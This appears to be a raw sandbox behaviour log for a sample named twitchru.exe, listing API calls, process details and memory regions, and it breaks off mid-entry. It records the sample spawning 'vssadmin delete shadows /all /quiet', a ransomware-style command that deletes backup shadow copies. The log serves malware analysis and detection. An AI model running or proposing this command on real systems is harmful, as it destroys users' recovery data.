_wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0230.768] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0230.768] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0230.768] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0230.769] SetErrorMode (uMode=0x0) returned 0x0 [0230.769] SetErrorMode (uMode=0x1) returned 0x0 [0230.769] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x534aea0, lpFilePart=0x506f404 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x506f404*="system32") returned 0x13 [0230.769] SetErrorMode (uMode=0x0) returned 0x1 [0230.769] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0230.769] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0230.778] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0230.782] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0230.782] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0230.782] GetConsoleTitleW (in: lpConsoleTitle=0x506f684, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe") returned 0x2a [0230.790] InitializeProcThreadAttributeList (in: lpAttributeList=0x506f5b0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x506f594 | out: lpAttributeList=0x506f5b0, lpSize=0x506f594) returned 1 [0230.790] UpdateProcThreadAttribute (in: lpAttributeList=0x506f5b0, dwFlags=0x0, Attribute=0x60001, lpValue=0x506f59c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x506f5b0, lpPreviousValue=0x0) returned 1 [0230.790] GetStartupInfoW (in: lpStartupInfo=0x506f5e8 | out: lpStartupInfo=0x506f5e8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0230.790] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0230.791] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0230.791] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0230.793] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x506f538*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x506f584 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x506f584*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x860, dwThreadId=0x744)) returned 1 [0230.816] CloseHandle (hObject=0xa4) returned 1 [0230.816] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0230.816] GetEnvironmentStringsW () returned 0x5349e00* [0230.816] FreeEnvironmentStringsA (penv="=") returned 1 [0230.816] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0231.152] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x506f51c | out: lpExitCode=0x506f51c*=0x2) returned 1 [0231.153] CloseHandle (hObject=0xa8) returned 1 [0231.153] _vsnwprintf (in: _Buffer=0x506f604, _BufferCount=0x13, _Format="%08X", _ArgList=0x506f524 | out: _Buffer="00000002") returned 8 [0231.153] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0231.153] GetEnvironmentStringsW () returned 0x534b338* [0231.153] FreeEnvironmentStringsA (penv="=") returned 1 [0231.153] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0231.153] GetEnvironmentStringsW () returned 0x534b338* [0231.153] FreeEnvironmentStringsA (penv="=") returned 1 [0231.153] DeleteProcThreadAttributeList (in: lpAttributeList=0x506f5b0 | out: lpAttributeList=0x506f5b0) [0231.153] _get_osfhandle (_FileHandle=1) returned 0xc [0231.153] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0231.154] _get_osfhandle (_FileHandle=1) returned 0xc [0231.154] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x8ee40c | out: lpMode=0x8ee40c) returned 1 [0231.154] _get_osfhandle (_FileHandle=0) returned 0x8 [0231.154] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x8ee408 | out: lpMode=0x8ee408) returned 1 [0231.155] SetConsoleInputExeNameW () returned 0x1 [0231.155] GetConsoleOutputCP () returned 0x1b5 [0231.155] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x8ee460 | out: lpCPInfo=0x8ee460) returned 1 [0231.155] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.155] exit (_Code=2) Thread: id = 36 os_tid = 0xb0c Process: id = "10" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x65cf3000" os_pid = "0x860" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x36c" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001c04d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1110 start_va = 0x2c0000 end_va = 0x2ddfff entry_point = 0x2c0000 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe") Region: id = 1111 start_va = 0x6b0000 end_va = 0x46affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1112 start_va = 0x46b0000 end_va = 0x46cffff entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 1113 start_va = 0x46d0000 end_va = 0x46d1fff entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 1114 start_va = 0x46e0000 end_va = 0x46f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046e0000" filename = "" Region: id = 1115 start_va = 0x4700000 end_va = 0x473ffff entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1116 start_va = 0x4740000 end_va = 0x477ffff entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 1117 start_va = 0x4780000 end_va = 0x4783fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004780000" filename = "" Region: id = 1118 start_va = 0x4790000 end_va = 0x4790fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004790000" filename = "" Region: id = 1119 start_va = 0x47a0000 end_va = 0x47a1fff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 1120 start_va = 0x76f90000 end_va = 0x77108fff entry_point = 0x76f90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1121 start_va = 0x7e8e0000 end_va = 0x7e902fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e8e0000" filename = "" Region: id = 1122 start_va = 0x7e909000 end_va = 0x7e909fff entry_point = 0x0 region_type = private name = "private_0x000000007e909000" filename = "" Region: id = 1123 start_va = 0x7e90c000 end_va = 0x7e90efff entry_point = 0x0 region_type = private name = "private_0x000000007e90c000" filename = "" Region: id = 1124 start_va = 0x7e90f000 end_va = 0x7e90ffff entry_point = 0x0 region_type = private name = "private_0x000000007e90f000" filename = "" Region: id = 1125 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1126 start_va = 0x7fff0000 end_va = 0x7dfa4d88ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1127 start_va = 0x7dfa4d890000 end_va = 0x7ffa4d88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfa4d890000" filename = "" Region: id = 1128 start_va = 0x7ffa4d890000 end_va = 0x7ffa4da51fff entry_point = 0x7ffa4d890000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1129 start_va = 0x7ffa4da52000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffa4da52000" filename = "" Region: id = 1130 start_va = 0x4890000 end_va = 0x489ffff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 1131 start_va = 0x716e0000 end_va = 0x71752fff entry_point = 0x716e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1132 start_va = 0x71770000 end_va = 0x717befff entry_point = 0x71770000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1133 start_va = 0x71760000 end_va = 0x71767fff entry_point = 0x71760000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1134 start_va = 0x46b0000 end_va = 0x46bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046b0000" filename = "" Region: id = 1135 start_va = 0x46c0000 end_va = 0x46c3fff entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 1136 start_va = 0x47b0000 end_va = 0x486dfff entry_point = 0x47b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1137 start_va = 0x4880000 end_va = 0x488ffff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 1138 start_va = 0x48a0000 end_va = 0x499ffff entry_point = 0x0 region_type = private name = "private_0x00000000048a0000" filename = "" Region: id = 1139 start_va = 0x49a0000 end_va = 0x49dffff entry_point = 0x0 region_type = private name = "private_0x00000000049a0000" filename = "" Region: id = 1140 start_va = 0x49e0000 end_va = 0x4a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 1141 start_va = 0x73860000 end_va = 0x7397afff entry_point = 0x73860000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll") Region: id = 1142 start_va = 0x73a70000 end_va = 0x73a80fff entry_point = 0x73a70000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll") Region: id = 1143 start_va = 0x73a90000 end_va = 0x73aa7fff entry_point = 0x73a90000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 1144 start_va = 0x74030000 end_va = 0x74088fff entry_point = 0x74030000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1145 start_va = 0x74090000 end_va = 0x74099fff entry_point = 0x74090000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1146 start_va = 0x740a0000 end_va = 0x740bdfff entry_point = 0x740a0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1147 start_va = 0x740e0000 end_va = 0x7422cfff entry_point = 0x740e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1148 start_va = 0x74230000 end_va = 0x743e9fff entry_point = 0x74230000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1149 start_va = 0x74580000 end_va = 0x745c2fff entry_point = 0x74580000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1150 start_va = 0x75c80000 end_va = 0x75c86fff entry_point = 0x75c80000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1151 start_va = 0x75e40000 end_va = 0x75efdfff entry_point = 0x75e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1152 start_va = 0x75ff0000 end_va = 0x76033fff entry_point = 0x75ff0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1153 start_va = 0x76040000 end_va = 0x760bafff entry_point = 0x76040000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1154 start_va = 0x761e0000 end_va = 0x76271fff entry_point = 0x761e0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1155 start_va = 0x762d0000 end_va = 0x7637bfff entry_point = 0x762d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1156 start_va = 0x76510000 end_va = 0x76685fff entry_point = 0x76510000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1157 start_va = 0x766a0000 end_va = 0x766fbfff entry_point = 0x766a0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1158 start_va = 0x76870000 end_va = 0x7695ffff entry_point = 0x76870000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1159 start_va = 0x76e40000 end_va = 0x76f7ffff entry_point = 0x76e40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1160 start_va = 0x7e7e0000 end_va = 0x7e8dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e7e0000" filename = "" Region: id = 1161 start_va = 0x7e906000 end_va = 0x7e908fff entry_point = 0x0 region_type = private name = "private_0x000000007e906000" filename = "" Region: id = 1162 start_va = 0x46d0000 end_va = 0x46dcfff entry_point = 0x46d0000 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui") Region: id = 1163 start_va = 0x4870000 end_va = 0x4870fff entry_point = 0x0 region_type = private name = "private_0x0000000004870000" filename = "" Region: id = 1164 start_va = 0x4a20000 end_va = 0x4ba7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a20000" filename = "" Region: id = 1165 start_va = 0x4bb0000 end_va = 0x4d30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bb0000" filename = "" Region: id = 1166 start_va = 0x4d40000 end_va = 0x613ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d40000" filename = "" Region: id = 1167 start_va = 0x6140000 end_va = 0x6140fff entry_point = 0x0 region_type = private name = "private_0x0000000006140000" filename = "" Region: id = 1168 start_va = 0x6150000 end_va = 0x6153fff entry_point = 0x0 region_type = private name = "private_0x0000000006150000" filename = "" Region: id = 1169 start_va = 0x6160000 end_va = 0x6160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006160000" filename = "" Region: id = 1170 start_va = 0x745d0000 end_va = 0x746effff entry_point = 0x745d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1171 start_va = 0x74740000 end_va = 0x7476afff entry_point = 0x74740000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1172 start_va = 0x760c0000 end_va = 0x760cbfff entry_point = 0x760c0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1173 start_va = 0x76380000 end_va = 0x76401fff entry_point = 0x76380000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1174 start_va = 0x6170000 end_va = 0x6170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006170000" filename = "" Region: id = 1175 start_va = 0x73a50000 end_va = 0x73a62fff entry_point = 0x73a50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1176 start_va = 0x73d90000 end_va = 0x73daafff entry_point = 0x73d90000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1177 start_va = 0x73a20000 end_va = 0x73a4efff entry_point = 0x73a20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Thread: id = 37 os_tid = 0x744 Thread: id = 38 os_tid = 0x8b0 Thread: id = 39 os_tid = 0xb04 Thread: id = 40 os_tid = 0xb18 Thread: id = 41 os_tid = 0x888 Process: id = "11" image_name = "twitchru.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe" page_root = "0x7b103000" os_pid = "0xad0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x784" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe\" " cur_dir = "C:\\Windows\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001c04d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Process: id = "12" image_name = "werfault.exe" filename = "c:\\windows\\syswow64\\werfault.exe" page_root = "0x6380000" os_pid = "0xabc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x784" cmd_line = "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 1924 -s 23928" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001c04d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1208 start_va = 0x140000 end_va = 0x182fff entry_point = 0x140000 region_type = mapped_file name = "werfault.exe" filename = "\\Windows\\SysWOW64\\WerFault.exe" (normalized: "c:\\windows\\syswow64\\werfault.exe") Region: id = 1209 start_va = 0x380000 end_va = 0x437ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1210 start_va = 0x4380000 end_va = 0x439ffff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 1211 start_va = 0x43a0000 end_va = 0x43a0fff entry_point = 0x0 region_type = private name = "private_0x00000000043a0000" filename = "" Region: id = 1212 start_va = 0x43b0000 end_va = 0x43c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000043b0000" filename = "" Region: id = 1213 start_va = 0x43d0000 end_va = 0x440ffff entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 1214 start_va = 0x4410000 end_va = 0x444ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 1215 start_va = 0x4450000 end_va = 0x4453fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004450000" filename = "" Region: id = 1216 start_va = 0x4460000 end_va = 0x4462fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004460000" filename = "" Region: id = 1217 start_va = 0x4470000 end_va = 0x4471fff entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 1218 start_va = 0x76f90000 end_va = 0x77108fff entry_point = 0x76f90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1219 start_va = 0x7e730000 end_va = 0x7e752fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e730000" filename = "" Region: id = 1220 start_va = 0x7e759000 end_va = 0x7e759fff entry_point = 0x0 region_type = private name = "private_0x000000007e759000" filename = "" Region: id = 1221 start_va = 0x7e75c000 end_va = 0x7e75efff entry_point = 0x0 region_type = private name = "private_0x000000007e75c000" filename = "" Region: id = 1222 start_va = 0x7e75f000 end_va = 0x7e75ffff entry_point = 0x0 region_type = private name = "private_0x000000007e75f000" filename = "" Region: id = 1223 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1224 start_va = 0x7fff0000 end_va = 0x7dfa4d88ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1225 start_va = 0x7dfa4d890000 end_va = 0x7ffa4d88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfa4d890000" filename = "" Region: id = 1226 start_va = 0x7ffa4d890000 end_va = 0x7ffa4da51fff entry_point = 0x7ffa4d890000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1227 start_va = 0x7ffa4da52000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffa4da52000" filename = "" Region: id = 1228 start_va = 0x45a0000 end_va = 0x45affff entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 1229 start_va = 0x716e0000 end_va = 0x71752fff entry_point = 0x716e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1230 start_va = 0x71770000 end_va = 0x717befff entry_point 